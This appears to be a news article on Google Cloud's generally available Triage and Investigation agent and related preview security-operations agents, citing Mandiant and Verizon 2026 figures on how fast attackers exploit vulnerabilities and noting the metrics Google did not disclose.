Google Cloud says its Triage and Investigation agent in Google Security Operations has investigated more than 5 million alerts, reducing a typical 30-minute manual analysis to 60 seconds with Gemini.
The figure, disclosed in a June 10 Google Cloud post, gives a production-scale number to an enterprise use case for agentic AI: moving alert review, evidence gathering and incident explanation into the normal security operations workflow.
The agent is now generally available. Google said it autonomously investigates alerts, gathers evidence, provides verdicts with explanations and supports alert closure and remediation flows.
Google’s product language keeps analysts in control of “critical, high-impact actions,” while allowing AI to support decision-making and remediation workflows.
Extending the threat defense framework
The release extends Google AI Threat Defense, which Google Cloud introduced on May 28 as an automated security system built around four steps: prepare, scan and prioritize, remediate and monitor. The June update sits in the monitor layer, where Google Security Operations agents are being used for detection engineering, triage, containment and threat hunting.
Combating an accelerated attack cycle
Google says the rollout against a faster attack cycle. Mandiant’s M-Trends 2026 report, based on more than 500,000 hours of frontline incident investigations in 2025, found exploits remained the most common initial infection vector for the sixth consecutive year, accounting for 32% of intrusions. Mandiant also said the median time between an initial access event and hand-off to a secondary threat group fell from more than eight hours in 2022 to 22 seconds in 2025.
The same report found the mean time to exploit vulnerabilities dropped to an estimated -7 days, meaning exploitation was routinely occurring before a patch was released. Mandiant placed that acceleration in the context of zero-day use, edge and core network devices, and infrastructure that often lacks standard endpoint detection and response telemetry.
Verizon’s 2026 Data Breach Investigations Report points in the same direction. Verizon said 31% of breaches now start with software vulnerabilities, ahead of stolen passwords, and 15 attack techniques are being bolstered by generative AI. The report describes attackers using AI to work faster across stages from spotting gaps to writing malware.
Connecting detection and investigation agents
Google’s SOC agent rollout is built around several linked functions. The Detection Engineering agent, now in preview, can translate exploitation patterns into custom detections for a customer’s environment.
Google said the agent uses sources including Google Threat Intelligence, Mandiant-curated attack patterns, offensive tool repositories, red and purple team reports, open-source detection repositories and internal telemetry. It can also validate rules with synthetic events before an exploit reaches the environment.
The generally available Triage and Investigation agent then works across endpoints, on-premises firewalls, identity, network data, cloud telemetry and custom application logs. Google said the agent uses those signals to build an attack narrative from separate alerts, a function aimed at reducing alert-by-alert investigation time when attackers move across several systems.
Automating containment and threat hunting
Google is also previewing agentic containment and response. The response model pairs AI agents, which gather evidence and reason through alerts, with deterministic playbooks, which keep high-impact actions under analyst control.
A separate Threat Hunting agent, also in preview, searches historical logs and enterprise telemetry for stealthy activity and novel attack patterns.
The agents now sit across detection creation, alert investigation, response automation and retroactive hunting, the same sequence security teams use to move from signal to containment.
Addressing boundaries and missing metrics
The boundaries remain important. Google has disclosed the alert volume handled by the Triage and Investigation agent and the claimed reduction in analysis time, but its post does not provide false-positive rates, customer-by-customer performance ranges or detailed criteria for when containment steps require human approval.